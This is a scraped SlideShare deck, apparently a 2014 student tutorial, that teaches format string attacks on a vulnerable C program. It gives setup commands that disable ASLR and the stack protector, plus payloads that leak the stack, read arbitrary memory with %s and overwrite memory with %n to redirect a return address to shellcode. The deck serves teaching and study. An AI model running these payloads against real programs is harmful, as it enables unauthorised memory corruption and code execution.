Format String Attacks
AJ
2014.1.18
About Me
• Study in National Chung Cheng University

• The simulator of 5 axis CNC machine tool

• CUDA programming for th...
Outline
• Illustrating format string vulnerabilities
• A case study
•
•
•
•
•

fsa.c
Compile and setup insecure environmen...
Format String Vulnerabilities
• format string <->argv[1]
• printf(argv[1])
• strcpy(buff,argv[1])
• snprintf(buf,sizeof bu...
A Case Study: fsa.c
A Case Study: Compile and Setup
Insecure Environment
• Compile
• gcc -g -Wno-format-security -fno-stack-protector fsa.c

•...
Stack Status before Executing snpritf()

esp

??
??
??
x = 97 = ‘a’
buf[100]

stack
Viewing the Stack:”%x.%x.%x.%x.%x”

heap
“%x.%x.%x.%x.%x”

• Format string = %x.%x.%x.%x.%x
Buffer pointer

• snprintf(buf...
Viewing the Stack:”%x.%x.%x.%x.%x”

heap
“%x.%x.%x.%x.%x”

• Format string = %x.%x.%x.%x.%x
Buffer pointer

• snprintf(buf...
Viewing the Stack:”%x.%x.%x.%x.%x”

heap
“%x.%x.%x.%x.%x”

• Format string = %x.%x.%x.%x.%x
Buffer pointer

Buffer length
...
Viewing the Stack:
“aaaa.%x.%x.%x.%x.%x”
• Format string = aaaa.%x.%x.%x.%x.%x

heap
“aaaa.%x.%x.%x.%
x.%x”

Buffer pointe...
Viewing Memory at Any Location
• Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%x

• Format string = $(printf “xf8x...
Overwriting of Arbitrary Memory
• The %n field was encountered in the format string
• Format string = $(printf “xf8xf2xffx...
So, You Can…
• Format string vulnerabilities
• Viewing the stack
• Finding return addresses

• Overwriting return address
...
You can overwrite arbitrary memory, if
there are format string vulnerabilities
Reference
• Tim Newsham, “Format String Attacks”

• http://www.thenewsh.com/~newsham/format-string-attacks.pdf

• stackove...
Upcoming SlideShare
Loading in...5
×

[MOSUT] Format String Attacks

686
-1

Published on

一個學習format string attack與分享的故事
Outline:
*Illustrating format string vulnerabilities
*A case study
+fsa.c
+Compile and setup insecure environment
+Viewing the stack
+Viewing Memory at any location
+Overwriting of arbitrary memory
*So, You Can…

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
686
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
17
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

[MOSUT] Format String Attacks

  1. 1. Format String Attacks AJ 2014.1.18
  2. 2. About Me • Study in National Chung Cheng University • The simulator of 5 axis CNC machine tool • CUDA programming for the collision detection in real time • 若渴計畫 & MOSUT
  3. 3. Outline • Illustrating format string vulnerabilities • A case study • • • • • fsa.c Compile and setup insecure environment Viewing the stack Viewing memory at any location Overwriting of arbitrary memory • So, you can…
  4. 4. Format String Vulnerabilities • format string <->argv[1] • printf(argv[1]) • strcpy(buff,argv[1]) • snprintf(buf,sizeof buf,argv[1]); •… • EX: compile & execute
  5. 5. A Case Study: fsa.c
  6. 6. A Case Study: Compile and Setup Insecure Environment • Compile • gcc -g -Wno-format-security -fno-stack-protector fsa.c • Disable ASLR(address space layout randomization) • sudo sysctl -w kernel.randomize_va_space=0 • X86 machine & Unbuntu 12.04
  7. 7. Stack Status before Executing snpritf() esp ?? ?? ?? x = 97 = ‘a’ buf[100] stack
  8. 8. Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) Buffer length argv[1] pointer ?? b7ff3fec ?? bfffff3b4 c call convention http://descent-incoming.blogspot.tw/2012/11/pascal-call-convention-in-c.html ?? 0 x = 97 = ‘a’ buf[100] Richard Reese,透視c語言指標 p.128
  9. 9. Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) fetch Buffer length argv[1] pointer stack %x ?? b7ff3fec %x ?? bfffff3b4 %x ?? 0 %x x = 97 = ‘a’ %x buf[100]
  10. 10. Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer Buffer length • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) argv[1] pointer ?? b7ff3fec ?? bfffff3b4 ?? 0 copy x = 97 = ‘a’ %x?? Execution order of “copy” and “fetch” are switched by OS buf[100]=b7ff3fec. Bfffff3b4. 0.61.66663762(ff7b)
  11. 11. Viewing the Stack: “aaaa.%x.%x.%x.%x.%x” • Format string = aaaa.%x.%x.%x.%x.%x heap “aaaa.%x.%x.%x.% x.%x” Buffer pointer • ‘a’ is 0x61 in ASCII • snprintf(buf, sizeof buf, “aaaa.%x.%x.%x.%x.%x”) Buffer length argv[1] pointer %x ?? b7ff3fec %x ?? bfffff3b4 %x ?? 0 %x x = 97 = ‘a’ %x buf[100]=aaaa.b7ff3f ec.bffff3a4.0.61.6161 6161
  12. 12. Viewing Memory at Any Location • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%x • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%s bffff2f8 x = 97 = ‘a’ %s buf[0]=bffff2f8
  13. 13. Overwriting of Arbitrary Memory • The %n field was encountered in the format string • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%n 26(??) alignment bffff2f8 x = 97 = ‘a’ %s buf[0]=bffff2f8 bffff2f8 x = 28 = 0x1c %n buf[0]=bffff2f8
  14. 14. So, You Can… • Format string vulnerabilities • Viewing the stack • Finding return addresses • Overwriting return address • Overwriting return addresses to point to shellcode • EX: $ ./a.out $(printf “return address”).%x.%x.%x.%x.%n => retrun address = 28 $ ./a.out $(printf “return address”).%x.%x.%x.%4x.%n => retrun address = 30 $ ./a.out $(printf “return address”).%x.%x.%x.%8x.%n => retrun address = 34 $ ./a.out $(printf “return address”).%Xx.%Yx.%Zx.%Ax.%n => retrun address = shellcode address
  15. 15. You can overwrite arbitrary memory, if there are format string vulnerabilities
  16. 16. Reference • Tim Newsham, “Format String Attacks” • http://www.thenewsh.com/~newsham/format-string-attacks.pdf • stackoverflow,“How can a Format-String vulnerability be exploited?” • http://stackoverflow.com/questions/7459630/how-can-a-format-string-vulnerabilitybe-exploited • Paul Haas, Advanced Format String Attacks • http://www.defcon.org/images/defcon-18/dc-18-presentations/Haas/DEFCON-18Haas-Adv-Format-String-Attacks.pdf • David Brumley, Cource sliedes • http://users.ece.cmu.edu/~dbrumley/courses/18739c-s11/slides/0127.pdf • Scut et al,”Exploiting Format String Vulnerabilities” • http://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×